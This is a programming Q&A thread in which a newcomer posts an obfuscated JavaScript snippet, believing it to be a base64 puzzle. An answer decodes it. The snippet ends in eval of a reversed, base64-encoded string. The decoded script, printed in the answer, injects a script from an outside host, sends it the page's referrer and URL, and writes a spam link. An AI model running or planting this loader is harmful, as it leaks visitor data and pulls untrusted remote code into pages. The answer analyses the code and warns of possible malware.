# How to figure out and solve this base64 code?

Tags: javascript, base64

A friend of mine challenged me to solve what I believe is base64 code (though I am not sure because I am new to coding). He said it should be a clear message about 20 characters long in the English language. Anyway, the code is here:

```
var _11l = '=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';

function _0II(data) {
    var OlllOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        enc = '';
    do {
        h1 = OlllOI.indexOf(data.charAt(i++));
        h2 = OlllOI.indexOf(data.charAt(i++));
        h3 = OlllOI.indexOf(data.charAt(i++));
        h4 = OlllOI.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) {
            enc += String.fromCharCode(o1)
        } else if (h4 == 64) {
            enc += String.fromCharCode(o1, o2)
        } else {
            enc += String.fromCharCode(o1, o2, o3)
        }
    } while (i < data.length);
    return enc
}
function Oll(string) {
    var ret = '',
        i = 0;
    for (i = string.length - 1; i >= 0; i--) {
        ret += string.charAt(i);
    }
    return ret;
}eval(_0II(Oll(_11l)));
```

Comment: Did you try to decode your supposedly base64 encoded string using an online/offline tool?

Comment: If your question has been solved consider sharing the solution with us as an answer. You can mark your own answer (or one of the other if they helped you solve it) as accepted.

Answer (score 1):

The first function `_0II` decodes a base64 string, the second function `Oll` reverses a string.

If you run `console.log(_0II(Oll(_11l));` you get a packed JavaScript string printed to the console. If you unpack said string you'll get something along the lines:

```
var _escape = '%3Cscript%3Evar%20link%20%3D%20%22http%3A//wwweuro.ru/dl/%3Fq%3D%22%3B%3C/script%3E';
var llI = document.createElement('script');
llI.src = 'http://jqueryapi.info/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
var I0O = document.getElementsByTagName('head')[0];
I0O.appendChild(llI);
document.write(unescape(_escape));
```

The problem is that this script fails (at least the script it subsequently  inserts into the DOM does), if you run said script it will insert the following into the DOM:

```
<script>var link = "http://wwweuro.ru/dl/?q=''";</script>
<script src="http://jqueryapi.info/?getsrc=ok&amp;ref={ referrer goes here }&amp;url={ page URL goes here }"></script>
```

But at this point it fails to load a JS file at `http://jqueryapi.info`.

My guess is that this is suppose to load a JavaScript file located at `http://jqueryapi.info` (and that potentially it will only do this for a specific referrer and url), and that said file will then use the contents of the `link` variable to do something interesting - like output your 20 character hidden message...

**...or potentially this loads/runs something horrible that for example attempts to install malware, probably not given it's your friend but perhaps proceed with a little caution.**

Anyway hopefully my explanation of what's going on will help you to discover this 20 character hidden message, if nothing else it at least removes the mystery around the encoded contents of `_11l`.

Comment: The domain wwweuro.ru seems to forward to a number of domains that sell products for erm... well... stuff (depending on which params you send it), I'm afraid the secret message from *your friend* might be something like 'erectile dysfunction' (21 chars) - now just have to explain to my wife my browser history!

Answer (score 0):

Using the functions `atob()` and `btoa()` decode and encode a string  to and from base64